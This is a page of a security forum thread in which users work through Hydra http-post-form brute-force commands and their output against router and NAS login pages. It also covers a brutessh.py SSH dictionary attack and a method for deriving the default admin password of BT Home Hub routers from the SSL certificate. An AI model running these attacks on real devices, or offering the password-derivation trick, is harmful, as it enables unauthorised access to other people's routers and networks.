Page 2 of 2 FirstFirst 12
Results 11 to 15 of 15

Thread: Using hydra to bruteforce a router with cgi-bin/[xy] authentication

  1. #11
    Member
    Join Date
    Jun 2008
    Posts
    101

    Default

    First of all let me say this is a well explained tutorial! At home I have a Buffalo NAS that uses cgi-bin authentication. Below you can see the source code info...

    <form id="frmNas" name="frmNas" method="post" action="/cgi-bin/top.cgi">
    <input type="text" id="txtAuthLoginUser" name="txtAuthLoginUser" value="" size="24" maxlength="20" />
    <input type="password" id="txtAuthLoginPassword" name="txtAuthLoginPassword" value="" size="24" maxlength="20" />
    It has a built-in user "admin"... So far I have everything except the "incorrect condition"... Here is how I'm executing Hydra with Wireshark to see what the NAS sends back...

    hydra -l "" -P shortdict.txt -t 1 -f -v -V 192.168.1.3 http-post-form /cgi-bin/top.cgi:txtAuthLoginUser=admin&txtAuthLoginPasswor d=^PASS^
    I'm actually stuck on the last part, "incorrect" condition. I ran wireshark and these are the responses it gave... In the image there are 2 POST by Hydra followed by TCP responses from the NAS.

    "htttp://img125.imageshack.us/img125/4821/authsnapshotpd0.jpg"

    Feel free to ask for additional info.

  2. #12
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    1

    Default help me!

    I found a USR with tF form.

    i used

    C:\run\hydra>hydra -l user -P dict_all_dates.txt -t 1 -f -v -V -e ns 192.168.2.1 http-post-form /cgi-bin/login.exews=^PASS^:loginpserr.stm

    Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra starting at 2009-01-26 23:01:59
    [DATA] 1 tasks, 1 servers, 470072 login tries (l:1/p:470072), ~470072 tries per
    task
    [DATA] attacking service http-post-form on port 80
    [VERBOSE] Resolving addresses ... done
    [ATTEMPT] target 192.168.2.1 - login "user" - pass "" - child 0 - 1 of 470072
    HTTP/1.0 302 Found
    Server: Apache/0.6.5
    Pragma: no-cache
    Date: Sun, 01 Jan 2001 00:00:00 GMT
    Expires: Sun, 01 Jan 2001 00:00:00 GMT
    Cache-Control: max-age=0, must-revalidate
    Connection: close
    Location: ............/loginpserr.stm
    Content-type: text/html

    <HEAD><TITLE>302 Document moved</TITLE></HEAD>
    <BODY><H1>302 Document moved</H1>
    This document has moved <A HREF="---------/192.168.2.1/loginpserr.stm">here</A>.<P>

    </BODY>
    [ATTEMPT] target 192.168.2.1 - login "user" - pass "user" - child 0 - 2 of 47007
    2
    [ATTEMPT] target 192.168.2.1 - login "user" - pass "01 01 00" - child 0 - 3 of 4
    70072
    HTTP/1.0 302 Found
    Server: Apache/0.6.5
    Pragma: no-cache
    Date: Sun, 01 Jan 2001 00:00:00 GMT
    Expires: Sun, 01 Jan 2001 00:00:00 GMT
    Cache-Control: max-age=0, must-revalidate
    Connection: close
    Location: ---------/loginpserr.stm
    Content-type: text/html

    <HEAD><TITLE>302 Document moved</TITLE></HEAD>
    <BODY><H1>302 Document moved</H1>
    This document has moved <A HREF="........192.168.2.1/loginpserr.stm">here</A>.<P>

    .....
    mmmm it's correct?

    I try with pass="" or other pass in my router, but hydra not found it!!

    Bye,
    Mariodm

  3. #13
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Just reading this and I know its a bit old but the serial number for those BT router are in the SSL cert. Just login goto https://192.168.1.254 and examine the security cert. I think you have to add cp before the serial to login.

  4. #14

    Default

    Quote Originally Posted by Dr_GrEeN View Post
    Just reading this and I know its a bit old but the serial number for those BT router are in the SSL cert. Just login goto https://192.168.1.254 and examine the security cert. I think you have to add cp before the serial to login.
    Hi Dr_GrEen!

    Thank you for your advice, I was just looking on the forums for such an answer and you gave me the answer I was looking for. Great trick with the SSL cert. I examined my SSL cert and ran into a problem.

    When you stated "I think you have to add cp before the serial to login", what did you mean by "cp"? Did you mean the letters "cp", or did you mean "CN" (Common Name)? Because I can not find anything called "CP" within the SSL Cert.

    I tried using:
    cpXXXXXXXX
    &
    cpXX:XX:XX:XX
    X=Digit of Serial

    But neither work, instead I am prompted with a popup error:
    Code:
    Error establishing an encrypted connection to 192.168.1.254. Error Code: -12217
    So I went to Google to do some research on this "cp" that I do not understand. I came to this page:
    http://www.gnucitizen.org/blog/dumpi...e-bt-home-hub/

    And found the following:

    REPLY-ANT-SEARCH MDAP/1.1
    ANT-ID:0633EHPSL
    ANT-NAME:SpeedTouch BTHH
    ANT-MAC:00-14-7F-AA-BB-CC
    ANT-HOSTSETUP:auto
    TO-HOST:192.168.1.70:2317
    TP-VERSION:2.0.0
    MDAP-VERSION:1.2
    43


    The only difference between the ANT-ID parameter and the serial number of the Home Hub is that the serial number is prefixed with ‘CP’. So in this example, the corresponding serial number - which is the default admin password - would be CP0633EHPSL (see the screenshot for more information)
    So, now I know (by looking at the full page on the link above) that the only difference between the serial and the ANT-ID is that the serial just has "cp" (without quotes) as a prefix...just like you said. Sorry Dr_GREen as I just wanted to understand this and thought I would type out my thoughts incase anyone else didnt know where "cp" came from.

    So back to the problem I had earlier, where I was entering the wrong details. I checked the SSL Certificate and obviously when I viewed it, I seen the word "Serial" and automatically thought that is what it was - the serial. Infact it was not the serial at all, well not the serial of what I was pentesting.

    So after doing some reading I figured out that it is actually the Organizational Unit that is used in conjunction with the CP.

    Here is the information I was looking at on the SSL Certificate:

    Code:
    Common Name (CN)         BT Home Hub
    Organization (O)         THOMSON
    Organizational Unit      06XXXXXXX
    Serial Number            7E:XX:XX:XX
    Thank to you Dr_GrEen for telling us about the SSL Cert hint. Now I successfully have pwned my BTHomeHub

    So for quick reference, the serial of a BTHomeHub is the prefix "CP" + "Organizational Unit":
    Example:

    CP06XXXXXXX

    Do not be mislead by the SSL Certificate stating the "serial" as it is not the serial you will be using, its the Organizational Unit.

    This pentest was tested on the BT Home Hub using software version: 6.2.6.E

  5. #15
    Just burned his ISO
    Join Date
    Apr 2009
    Location
    Leicester, UK
    Posts
    6

    Default alternative in backtrack 4

    I don't know whether this post will help anyone but here goes

    In backtrack 4, you can use brutessh.py

    just navigate to the dir. (/pentest/password/brutessh)

    and run this command

    python brutessh.py -h [host name] -u [User name] -d [dictionary or password list]

    for example:


    python brutessh.py -h 192.168.1.100 -u Adam -d /pentest/password/jtr/password.lst

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •